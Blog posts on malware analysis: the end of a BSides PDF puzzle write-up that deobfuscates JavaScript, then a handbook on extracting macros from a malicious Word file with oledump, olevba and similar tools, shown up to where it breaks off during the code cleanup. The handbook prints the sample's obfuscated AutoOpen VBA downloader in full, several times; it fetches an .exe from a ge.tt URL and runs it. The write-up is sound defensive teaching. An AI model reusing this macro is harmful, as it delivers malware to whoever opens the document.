One of my favourite tools to analyze JavaScript is SpiderMonkey which is a JavaScript engine. It’s an easy way to run blocks of code to see what will be the result.

For instance in the above code, functions mmu7d() and mz821a() are used for string manipulation. You can put those functions into a file decode.js, then load the file into SpiderMonkey.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
js> load(['decode.js']) js> mmu7d("mfoCr", 3436, 3438); fromC js> mmu7d("omfrB", 527, 528); formB js> mmu7d("ohCerda", 5748, 5752) harCode js> 0x39 + 3 + ~ - ~ - ~57 0 js> mmu7d("elhtgn", 5071, 5075) length js> mmu7d("dtaoAhCecr", 8828, 8827) charCodeAt js> mmu7d(addObjects("a", "v") + "el", 2470, 2471) eval js> mmu7d("ratteg", 4898, 4901) target js> mmu7d("nuepacse", 6169, 6175) unescape

This makes our code more readable:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59
function vv56(h3m, n7) { return h3m + n7; } function mz821a(hu4, v9) { return v9[hu4] } function mmu7d(kjj, y7, y8) { var kmn6 = y7 % kjj.length; var s = ""; while (s.length < kjj.length) { s += mz821a(kmn6, kjj); kmn6 = (kmn6 + y8) % kjj.length; } return s; } var hnam4 = mmu7d("49%68%DC%79%C9%29%D8%DD%E9%19%4D%D9%18%9D%29%BD%19%B9%AC%3D%F9%C8%F8%09%8C%E8%E9%99%C8%FA%E9%78%9A%99%89%48%79%99%38%19%DD%C8%E8%89%D8%C9%7D%49%29%18%88%38%78%F8%18%9D%6D%C9%DD%99%E9%9D%E9%49%89%9D%9D%89%88%08%9D%38%E8%89%F9%FB%99%8C%D9%C8%48%89%39%DD%A9%8D%E8%6B%99%5D%18%88%D8%E8%1D%F8%39%39%2D%D8%39%3D%0D%DD%DD%EB%F9%59%AD%09%88%69%E8%E9%FC%38%8D%DD%C8%DD%EA%C9%19%19%F9%78%09%A9%FD%B8%C9%A8%DD%89%49%DD%DD%DD%DB%49%49%CB%D9%E9%FC%E8%B9%1C%6D%FC%D9%D9%9D%DD%A9%C9%1D%CD%A9%0A%59%28%DD%E8%29%E9%5D%49%3D%F8%D8%CC%48%29%99%48%28%4C%78%DA%", 199154, 198821); var as6z = mmu7d("%ED%B9%C9%08%38%E8%29%89%89%68%A9%28%DD%2C%8D%9C%AB%8B%89%9D%FD%F9%E9%ED%58%F8%ED%8D%D9%59%19%49%C9%BD%39%19%1D%9B%9u%B8%4D%B8%C9%E9%8D%DD%D9%09%F9%F8%B9%B8%BC%49%D9%C9%A9%4D%6D%99%D9%DD%88%C9%28%A9%A8%DB%39%48%6C%ED%28%F8%38%E8%19%4D%59%5D%49%4D%3D%99%3C%89%79%98%C9%5D%BD%3D%49%88%8D%5D%6D%C9%98%C9%B9%09%49%D9%09%D95E9%F8%98%99%49%F9%3D%F8%3D%FD%5D%89%69%8D%9D%D8%99%38%3D%49%4B%99%DC%F9%F8%89%E9%19%C8%59%99%9D%59%59%88%E9%89%18%A9%1D%3D%98%D8%4D%F8%49%49%DD%DD%F9%39%F9%38", 334776, 334478); function mns51() { if (this.secret === undefined) { return "fromC"; } return "fromB"; } function alopre7(no, uv) { var yg1; yg1 = mns51(); return mz821a(yg1 + no, uv); } function enx(u7b, i8uy) { var coded = ""; var f = alopre7("harCode", String); for (var i = 0; i < mz821a("length", u7b); i++) { coded += f(u7b["charCodeAt"](i) ^ i8uy); } return coded; } function ty32() { return mz821a("eval", mz821a("target", event)); } var my6 = ty32(); function dsm33() { return my6("unescape"); } var h7 = dsm33(); my6(enx(h7(as6z + hnam4), 0xFD));

It seems that last line of the code invokes all the functions. Let’s break it down:

as6z + hanm4 concatenates string variables

h7() invokes unescape()

enx(dstring,key) decodes string with a key

my6() invokes eval()

To see the results just comment out the following code and print() the results instead of eval():

1 2 3 4 5 6 7 8 9 10 11 12
//function ty32() { // return mz821a("eval", mz821a("target", event)); //} //var my6 = ty32(); //function dsm33() { // return my6("unescape"); //} //var h7 = dsm33(); //my6(enx(h7(as6z+hnam4), 0xFD)); print(enx(unescape(as6z+hnam4, 0xFD)))

Now run it in SpiderMonkey:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
remnux@remnux:~/Desktop/PDF-B/Post$ js object-904 > results remnux@remnux:~/Desktop/PDF-B/Post$ js-beautify results function raven() { if (this.getField("pass").value == this.getField("e").value + "antistring") { this.getField("door2").hidden = false; app.alert({ cMsg: "Congratulations! You have solved the puzzle", cTitle: "Access granted", nIcon: 3 }); } else { app.alert({ cMsg: "Invalid password! Try again", cTitle: "Wrong password", nIcon: 0 }); } } raven();

Condition included in raven() function reveals that the key is comprised of the value of the e field and the word antistring. What is the e field value and where we can find it?

Let’s go back to the object 913. Fields name seem to be defined with /T, for instance:

/T(door)

/T(msg)

/T(door2)

If we look closer /T(e) is present in the output of the object 913. Next to it, there is a value /V of 9053d91a70acfd6614f0243caac70ce2.

1 2 3 4
remnux@remnux:~/Desktop/PDF-B/Post$ egrep /T object913 <(D:20150308184228+00'00')/Rect[ 256.965 600.958 256.965 602.373]/BS <>/DA(/Helv 0 Tf 0 0 0 rg)/AP <191 0 R >>/V(9053d91a70acfd6614f0243caac70ce2)/DV(9053d91a70acfd6614f0243caac70ce2)/T(��%e)>>

Well, it turns out that 9053d91a70acfd6614f0243caac70ce2antistring is our key.

Bonus

During the initial analysis peepdf reported two JS objects (880, 904). We already know everything about object 904. What about the other one?

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
PPDF> object 880 << /Length 674 /Filter /FlateDecode >> stream var pluto = "its%13%05WUA%7DQ%17%025%07D_A@FQ@Q%13%0C%07%15%06Y%10%02%07G%12%0B%10I%11%0DR%08%1A%13XS%5EV%16J%11%15X%10%09%0A%02%01%16SID%0A_%5B@%13%00%0E%05%06%19%100%0A_%04N%1B%0FS%00%1A%0C%07%15%19DGZ%07RBA%5E%5E%02%0F%13%00S%16%5CA%0AD%5BD_%06A%0D%02NU%11%16%12%0E%08T%0C%1D%17%00%10%1E%13P_%5B%1FDZ%5D%04AU%13C%15%10D__S%15%10SZWC%08%0F%17RW%06%17%12%0C%0F%1A%00%03%01%1E%08%1A%0EV%5E%19%13%05LE%0EZQ%15%0A%05DPYCYFQQ@Z%0C%0F%12O%17X%0A%01V%04%00T%08%1D%10%16%0C%0D%08@%10ZQ%0E%5CR%15D%1Eki%25%0BXQCU%12E%5EUG%0A%0E%0F%10%1B%10%01%1C%12%0F%01%03I%0A%1B%07N%1C%02%19QYA%01XU%18%17V%00%0E%0F%08_WC%14%11YF%5C%13%17%09%04CUQ%10%0CQA%1A%06%00%10%1F%01I%0F%09%5D%10%5E%5D%0BN%11%09XGA%17%09DRSEQ%05D%12@%5B%06%0C@i%3Dd%0B%04%5C%0AN%0D%06%06T%14%06%1CGI%5CTJ%0DWVAV%5E%05C%15%01S%16H%5B%13%10S@%13%212%08%07RCB"; function whisper(lenore, tap) { var nap = ""; for (i=0; i<lenore.length;i++) { var a = lenore.charCodeAt(i); var b = a ^ tap.charCodeAt(i % tap.length); nap = nap+String.fromCharCode(b); } return nap; } this.getField("366").value = whisper(unescape(pluto), event.value); endstream PPDF> object 880 > object880.js

This object also includes an obfuscated string. It took me a while to realize what it is. whisper() seems to be another decrypting routine that accepts string to be decrypted and key as parameters. We have the message (pluto) and now we know the key right? What if…

1 2 3 4 5 6 7 8 9 10
remnux@remnux:~/Desktop/PDF-B/Post$ js js> load(["object880.js"]) js> pluto its%13%05WUA%7DQ%17%025%07D_A@FQ@Q%13%0C%07%15%06Y%10%02%07G%12%0B%10I%11%0DR%08%1A%13XS%5EV%16J%11%15X%10%09%0A%02%01%16SID%0A_%5B@%13%00%0E%05%06%19%100%0A_%04N%1B%0FS%00%1A%0C%07%15%19DGZ%07RBA%5E%5E%02%0F%13%00S%16%5CA%0AD%5BD_%06A%0D%02NU%11%16%12%0E%08T%0C%1D%17%00%10%1E%13P_%5B%1FDZ%5D%04AU%13C%15%10D__S%15%10SZWC%08%0F%17RW%06%17%12%0C%0F%1A%00%03%01%1E%08%1A%0EV%5E%19%13%05LE%0EZQ%15%0A%05DPYCYFQQ@Z%0C%0F%12O%17X%0A%01V%04%00T%08%1D%10%16%0C%0D%08@%10ZQ%0E%5CR%15D%1Eki%25%0BXQCU%12E%5EUG%0A%0E%0F%10%1B%10%01%1C%12%0F%01%03I%0A%1B%07N%1C%02%19QYA%01XU%18%17V%00%0E%0F%08_WC%14%11YF%5C%13%17%09%04CUQ%10%0CQA%1A%06%00%10%1F%01I%0F%09%5D%10%5E%5D%0BN%11%09XGA%17%09DRSEQ%05D%12@%5B%06%0C@i%3Dd%0B%04%5C%0AN%0D%06%06T%14%06%1CGI%5CTJ%0DWVAV%5E%05C%15%01S%16H%5B%13%10S@%13%212%08%07RCB js> whisper(unescape(pluto),"9053d91a70acfd6614f0243caac70ce2antistring") PDF and JavaScript are often abused by attackers to hide exploit code. Some of their tricks include multiple layers of encryption, clever strings and integer manipulation, automatic form actions, hidden anddecoy objects. Congratulations, by now you're already familiar with the basic tricks and know how to detect them! Thank you for playing and see you at BSides!

Thank you BSides London and thank you Liviu Itoafă for creating this challenge. I am still not sure if this is the right way to solve the challenge but it was fun!

Analyst's Handbook - Analyzing Weaponized Documents

2015-06-17T21:08:13+02:00

Weaponized documents (I really hate this name!) are just another method used by bad guys to deliver malicious payload. Recently this technique was used by criminal groups delivering banking trojans (e.g. Dridex), but as you might expect it was also used by APT actors (e.g. Rocket Kitten in Operation Woolen Goldfish). Regardless of the threat type (APT, commodity, etc.) analysis of the malicious documents should be an essential skill of every analyst.

Introduction

Nowadays Microsoft Office documents are a collections of XML files stored in a ZIP file. Historically storing multiple objects in one document was challenging for traditional file systems in terms of efficiency. In order to address this issue a structure called Microsoft Compound File Binary also known as Object Linking and Embedding (OLE) compound file was created. The structure defines files as hierarchical collection of two objects - storage and stream. Basically think of storage and a stream as directory and a file respectively.

Another objects that you might encounter in the OLE files are macros. Macros allow to automate tasks and add functionality to your documents like reports, forms, etc. Macros can use Visual Basic (VBA) which is where bad guys will often try to hide their malicious code. This is what we are after in this handbook - finding and extracting malicious code from OLE files!

Prerequisites

Process

Lenny Zeltser created an awesome cheat sheet for analyzing malicious documents. Generally it contains the following steps:

Find malicious code

Extract code

Analyze code

Extract host and network indicators

Malware Analysis

Analysis will be carried out in REMnux a free Linux Toolkit for Reverse-Engineering and Analyzing Malware. The easiest and quickest option is to download ova file and set up REMnux on a virtual machine. Keep in mind we will be analyzing malicious script so be sure to do it properly. I will not describe how to set up malware environment in this post however there are plenty of available resources here, here, here and here.

Sample

If you want to follow along with the examples you can grab the file from www.hybrid-analysis.com.

Analysis

Personally I like to start with a file command to get a better feeling of what am I dealing with.

1 2 3
remnux@remnux:~/Desktop/AnalystH$ file malware1.doc malware1.doc: CDF V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Admin, Template: Normal, Last Saved By: Raz0r, Revision Number: 198, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:47:00, Create Time/Date: Mon Jan 12 00:32:00 2015, Last Saved Time/Date: Wed May 6 04:22:00 2015, Number of Pages: 1, Number of Words: 21, Number of Characters: 122, Security: 0

Output provides a lot of useful information including:

File format: CDF V2 Document

OS: Windows

Application: Microsoft Word

Author name: Raz0r

Last Saved Time/Date: Wed May 6 04:22:00 2015

Compound Document Format (CDF) as described in the introduction section contains multiple different objects.

Let’s take a closer look.

oledump.py

First we will examine file with oledump.py written and maintained by Didier Stevens.

1 2 3 4 5 6 7 8 9 10 11 12 13
remnux@remnux:~/Desktop/AnalystH$ oledump.py malware1.doc 1: 114 '\x01CompObj' 2: 4096 '\x05DocumentSummaryInformation' 3: 4096 '\x05SummaryInformation' 4: 9602 '1Table' 5: 137803 'Data' 6: 539 'Macros/PROJECT' 7: 71 'Macros/PROJECTwm' 8: M 5258 'Macros/VBA/NewMacros' 9: m 938 'Macros/VBA/ThisDocument' 10: 3483 'Macros/VBA/_VBA_PROJECT' 11: 578 'Macros/VBA/dir' 12: 4096 'WordDocument'

One of the cool things about oledump.py is its ability to mark streams that contain VBA code. In the above output we can see two streams called NewMacros and ThisDocument. Letters M and m indicate that VBA code is present. Lowercase m means VBA contains only attributes statements (less interesting):

1 2 3 4 5 6 7 8 9
remnux@remnux:~/Desktop/AnalystH$ oledump.py -s9 -v malware1.doc Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True

Given stream can be viewed by adding -s with an object number. As we know we are dealing with the VBA code the -v option will instruct oledump.py to decompress VBA code and make it easy to read.

Let’s dump it for later comparison with other tools.

1
remnux@remnux:~/Desktop/AnalystH$ oledump.py -s9 -v malware1.doc > attribute_code

Now let’s move to the stream marked with capital M, this is usually where analysts find juicy stuff:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45
remnux@remnux:~/Desktop/AnalystH$ oledump.py -s8 -v malware1.doc Attribute VB_Name = "NewMacros" #If VBA7 Then Private Declare PtrSafe Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _ (ByVal JhjBjhGJHBfgjhffGggfGVgfVFGuHgHfGcV As Long, ByVal GyghGGBtgnfgdfGDFRGhojoJGBJFGhjFghJfHgh As String, ByVal tGtgfRDEVDFVUJUjhJGHJkujkuhJihuhBfgBF As String, ByVal lkaaJQQSxJfdLyE As Long, ByVal hujhBjhBfvcVcVdsswwsDswdFfgHUJFGHUJOIJJHhHjHGYYFtBVcfGGdGgDFGHuDfghuhDGhjjk As Long) As Long #Else Private Declare Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _ (ByVal gBfGFGHFGhRfghrtjgHJfGHJFGHjTyhjGFGVRFTRftyFtyFghDFvtRTRGfGDTR As Long, ByVal ltnbTaRjJOa6JYn As String, ByVal liCRZKNefyicowI As String, ByVal lGONydFEvaD5IuX As Long, ByVal lmRYfcuLs5uEk2Z As Long) As Long #End If Sub AutoOpen() Dim loyagdbd As String Dim hhNjnhbhghyjhtgjhGjhFGHjkGjkfGBJHDTRGVDTrhfg As String hhNjnhbhghyjhtgjhGjhFGHjkGjkfGBJHDTRGVDTrhfg = CurDir() Dim NewPath As String NewPath = Replace(hhNjnhbhghyjhtgjhGjhFGHjkGjkfGBJHDTRGVDTrhfg, "\Desktop", "\AppData\Roaming") NewPath = "C:\Users\Public\Documents" Dim CheckNumbers As String CheckNumbers = "" Dim hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg As String Dim NewString As String NewString = "Umbrella HBjhbhjkshdjkhJNggg GjHgggJkmNjh .exe GjNghJGjhJggggJh ggJnggfgHfgHdfG dfGdfGHHfGHH dDFCdFGBHVBhGjijok ghnfVBFGRTYJh fCvFgyhBgHHhFvB" Dim LotsofFuckingStringinallinOne As String LotsofFuckingStringinallinOne = "protection \ vulnerable worksheet wsc footage s rasberry student" Dim AnotherShitisHereSaysthis As String AnotherShitisHereSaysthis = "SbieCtrl encryption deauthentication hell ript. intrusion wireshark" Dim FinalWord As String FinalWord = CheckNumbers + Split(LotsofFuckingStringinallinOne)(4) + CheckNumbers + Split(AnotherShitisHereSaysthis)(4) hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg = Split(AnotherShitisHereSaysthis)(0) & Split(NewString)(3) iJJHBujHgbgbtgftYtyuRwerqweRweoijhoIJOJnikjgHNFVBcv = "http://ge" & "." & "tt/api/1/files/2gmBurF2/0/blob?download" + CheckNumbers Dim IsProgramRegistered As String: IsProgramRegistered = FinalWord & Split(LotsofFuckingStringinallinOne)(6) ijHujhBujHBjHBgFfVGHGHjGhJFVGBHfvGFghJFV = CheckNumbers + CheckNumbers + CheckNumbers + "" + CheckNumbers + CheckNumbers lkFjuexVzhTjcrT = ijHujhBujHBjHBgFfVGHGHjGhJFVGBHfvGFghJFV & iJJHBujHgbgbtgftYtyuRwerqweRweoijhoIJOJnikjgHNFVBcv & "" iJghBfgBgBfgfVfBfVBFVBFhjhBjcVBcdVBCVBGBhjfGBFG = lkFjuexVzhTjcrT OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb = NewPath & Split(LotsofFuckingStringinallinOne)(1) & hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg + CheckNumbers lRoosrSIPgRZZm4 = OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb lFA9cYQDsQOBIWU = ProudtoBecomeaNepaliReverseEngineer(0, CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + iJghBfgBgBfgfVfBfVBFVBFhjhBjcVBcdVBCVBGBhjfGBFG & CheckNumbers & CheckNumbers & CheckNumbers, CheckNumbers & CheckNumbers & CheckNumbers & OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb & CheckNumbers & CheckNumbers, 0, 0) If Dir(OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb) <> "" Then Dim oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh As Object Set oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh = CreateObject(IsProgramRegistered & Split(AnotherShitisHereSaysthis)(3)) Set oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh = oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh.exec(OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb) End If End Sub

It is safe to say we found our malicious code! We will dump the code for further analysis.

1
remnux@remnux:~/Desktop/AnalystH$ oledump.py -s8 -v malware1.doc > malicious-code

Before we will delve into deobfuscation and code analysis let’s see how other tools cope with the same malicious file.

officeparser.py

officeparser.py by John William Davison prints similar information as oledump.py, however it does not help analysts with marking objects containing VBA code.

1 2 3 4 5 6 7 8 9 10 11 12 13
remnux@remnux:~/Desktop/AnalystH$ officeparser.py -t malware1.doc 1: Data 2: 1Table 3: WordDocument 4: SummaryInformation 5: DocumentSummaryInformation 8: ThisDocument 9: NewMacros 10: _VBA_PROJECT 11: dir 12: PROJECTwm 13: PROJECT 14: CompObj

Even though officeparser.py does not highlight object of interest, macros can still be extracted with the --extract-macros option:

1
remnux@remnux:~/Desktop/AnalystH$ officeparser.py --extract-macros malware1.doc

Each macro object found will be saved to a separate file:

1 2 3 4 5 6 7 8
remnux@remnux:~/Desktop/AnalystH$ ls -laS total 204 drwxrwxr-x 2 remnux remnux 4096 2015-05-17 08:06 . drwxrwxr-x 3 remnux remnux 4096 2015-05-11 15:18 .. -rw-rw-r-- 1 remnux remnux 3819 2015-05-17 07:47 malicious-code -rw-rw-r-- 1 remnux remnux 3819 2015-05-17 08:03 NewMacros.bas -rw-rw-r-- 1 remnux remnux 285 2015-05-17 08:06 attribute_code -rw-rw-r-- 1 remnux remnux 285 2015-05-17 08:03 ThisDocument.cls

officeparser.py dumped exactly the same content as oledump.py:

1 2 3 4 5
remnux@remnux:~/Desktop/AnalystH/part1$ md5sum * | sort -n c598c45b0d9d3090599ff1df77c5d612 attribute_code c598c45b0d9d3090599ff1df77c5d612 ThisDocument.cls 8789d66197b3bbf265b8ed339d2f06e7 malicious-code 8789d66197b3bbf265b8ed339d2f06e7 NewMacros.bas

OfficeMalScanner

OfficeMalScanner written by Frank Boldewin is less interactive but it automatically finds and extracts malicious code for further analysis. This is handy when we are interested in fast triage and code analysis only. OfficeMalScanner is not included in the newest REMnux v6.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
remnux@remnux:~/Desktop/AnalystH/part1$ OfficeMalScanner malware1.doc info +------------------------------------------+ | OfficeMalScanner v0.61 | | Frank Boldewin / www.reconstructer.org | +------------------------------------------+ [*] INFO mode selected [*] Opening file malware1.doc [*] Filesize is 176640 (0x2b200) Bytes [*] Ms Office OLE2 Compound Format document detected --------------------------------------- [Scanning for VB-code in MALWARE1.DOC] --------------------------------------- NewMacros ThisDocument ----------------------------------------------------------------------------- VB-MACRO CODE WAS FOUND INSIDE THIS FILE! The decompressed Macro code was stored here: ------> Z:\home\remnux\Desktop\AnalystH\part1\MALWARE1.DOC-Macros ----------------------------------------------------------------------------

Let’s check the files:

1 2 3
remnux@remnux:~/Desktop/AnalystH/part1/MALWARE1.DOC-Macros$ md5sum * 8789d66197b3bbf265b8ed339d2f06e7 NewMacros 76624a45e3d20ad3caeaa9d90d49dbbe ThisDocument

OfficeMalScanner was able to extract the same streams. The file NewMacros containing malicious script is exactly the same as extracted by other tools, however the file ThisDocument has different MD5 hash. By checking the content (omitted for brevity) it seems to merge parts of code from both streams containing VBA, which might confuse some of the analysts.

olevba.py

olevba.py created by Decalage performs all the steps of the process including the basic analysis of the code:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73
remnux@remnux:~/Desktop/AnalystH/part1$ olevba.py malware1.doc olevba 0.27 - http://decalage.info/python/oletools Flags Filename ----------- ----------------------------------------------------------------- OLE:MAS---- malware1.doc (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown) =============================================================================== FILE: malware1.doc Type: OLE ------------------------------------------------------------------------------- VBA MACRO ThisDocument.cls in file: malware1.doc - OLE stream: u'Macros/VBA/ThisDocument' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - (empty macro) ------------------------------------------------------------------------------- VBA MACRO NewMacros.bas in file: malware1.doc - OLE stream: u'Macros/VBA/NewMacros' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #If VBA7 Then Private Declare PtrSafe Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _ (ByVal JhjBjhGJHBfgjhffGggfGVgfVFGuHgHfGcV As Long, ByVal GyghGGBtgnfgdfGDFRGhojoJGBJFGhjFghJfHgh As String, ByVal tGtgfRDEVDFVUJUjhJGHJkujkuhJihuhBfgBF As String, ByVal lkaaJQQSxJfdLyE As Long, ByVal hujhBjhBfvcVcVdsswwsDswdFfgHUJFGHUJOIJJHhHjHGYYFtBVcfGGdGgDFGHuDfghuhDGhjjk As Long) As Long #Else Private Declare Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _ (ByVal gBfGFGHFGhRfghrtjgHJfGHJFGHjTyhjGFGVRFTRftyFtyFghDFvtRTRGfGDTR As Long, ByVal ltnbTaRjJOa6JYn As String, ByVal liCRZKNefyicowI As String, ByVal lGONydFEvaD5IuX As Long, ByVal lmRYfcuLs5uEk2Z As Long) As Long #End If Sub AutoOpen() Dim loyagdbd As String Dim hhNjnhbhghyjhtgjhGjhFGHjkGjkfGBJHDTRGVDTrhfg As String hhNjnhbhghyjhtgjhGjhFGHjkGjkfGBJHDTRGVDTrhfg = CurDir() Dim NewPath As String NewPath = Replace(hhNjnhbhghyjhtgjhGjhFGHjkGjkfGBJHDTRGVDTrhfg, "\Desktop", "\AppData\Roaming") NewPath = "C:\Users\Public\Documents" Dim CheckNumbers As String CheckNumbers = "" Dim hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg As String Dim NewString As String NewString = "Umbrella HBjhbhjkshdjkhJNggg GjHgggJkmNjh .exe GjNghJGjhJggggJh ggJnggfgHfgHdfG dfGdfGHHfGHH dDFCdFGBHVBhGjijok ghnfVBFGRTYJh fCvFgyhBgHHhFvB" Dim LotsofFuckingStringinallinOne As String LotsofFuckingStringinallinOne = "protection \ vulnerable worksheet wsc footage s rasberry student" Dim AnotherShitisHereSaysthis As String AnotherShitisHereSaysthis = "SbieCtrl encryption deauthentication hell ript. intrusion wireshark" Dim FinalWord As String FinalWord = CheckNumbers + Split(LotsofFuckingStringinallinOne)(4) + CheckNumbers + Split(AnotherShitisHereSaysthis)(4) hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg = Split(AnotherShitisHereSaysthis)(0) & Split(NewString)(3) iJJHBujHgbgbtgftYtyuRwerqweRweoijhoIJOJnikjgHNFVBcv = "http://ge" & "." & "tt/api/1/files/2gmBurF2/0/blob?download" + CheckNumbers Dim IsProgramRegistered As String: IsProgramRegistered = FinalWord & Split(LotsofFuckingStringinallinOne)(6) ijHujhBujHBjHBgFfVGHGHjGhJFVGBHfvGFghJFV = CheckNumbers + CheckNumbers + CheckNumbers + "" + CheckNumbers + CheckNumbers lkFjuexVzhTjcrT = ijHujhBujHBjHBgFfVGHGHjGhJFVGBHfvGFghJFV & iJJHBujHgbgbtgftYtyuRwerqweRweoijhoIJOJnikjgHNFVBcv & "" iJghBfgBgBfgfVfBfVBFVBFhjhBjcVBcdVBCVBGBhjfGBFG = lkFjuexVzhTjcrT OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb = NewPath & Split(LotsofFuckingStringinallinOne)(1) & hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg + CheckNumbers lRoosrSIPgRZZm4 = OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb lFA9cYQDsQOBIWU = ProudtoBecomeaNepaliReverseEngineer(0, CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + iJghBfgBgBfgfVfBfVBFVBFhjhBjcVBcdVBCVBGBhjfGBFG & CheckNumbers & CheckNumbers & CheckNumbers, CheckNumbers & CheckNumbers & CheckNumbers & OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb & CheckNumbers & CheckNumbers, 0, 0) If Dir(OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb) <> "" Then Dim oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh As Object Set oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh = CreateObject(IsProgramRegistered & Split(AnotherShitisHereSaysthis)(3)) Set oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh = oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh.exec(OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb) End If End Sub - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ANALYSIS: +------------+--------------------+---------------------------------------+ | Type | Keyword | Description | +------------+--------------------+---------------------------------------+ | AutoExec | AutoOpen | Runs when the Word document is opened | | Suspicious | CreateObject | May create an OLE object | | Suspicious | Lib | May run code from a DLL | | Suspicious | URLDownloadToFileA | May download files from the Internet | +------------+--------------------+---------------------------------------+

Unfortunately neither of the tools is able to deobfuscate the code it would be too easy! So far we researched different methods of finding and extracting malicious code from OLE documents. It is high time to deobfuscate this bad boy!

Code deobfuscation

There is never a “one fits all” solution to deobfuscate code. Good thing to start with is to clean up the code from randomly generated variable names. For this just open the code in any text editor and use “find and replace” feature to replace randomly named variables into something more readable.

I like to rename variables so they start with capital letter informing me about the variable type, for instance:

S_var1 means this variable is of a String type.

This is how code looks like after initial clean up:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43
Attribute VB_Name = "NewMacros" #If VBA7 Then Private Declare PtrSafe Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _ (ByVal L_var1 As Long, ByVal S_var1 As String, ByVal S_var2 As String, ByVal L_var2 As Long, ByVal L_var3 As Long) As Long #Else Private Declare Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _ (ByVal L_var4 As Long, ByVal S_var3 As String, ByVal S_var4 As String, ByVal L_var5 As Long, ByVal L_var6 As Long) As Long #End If Sub AutoOpen() Dim S_var5 As String Dim S_var6 As String S_var6 = CurDir() Dim NewPath As String NewPath = Replace(S_var6, "\Desktop", "\AppData\Roaming") NewPath = "C:\Users\Public\Documents" Dim CheckNumbers As String CheckNumbers = "" Dim S_var7 As String Dim NewString As String NewString = "Umbrella HBjhbhjkshdjkhJNggg GjHgggJkmNjh .exe GjNghJGjhJggggJh 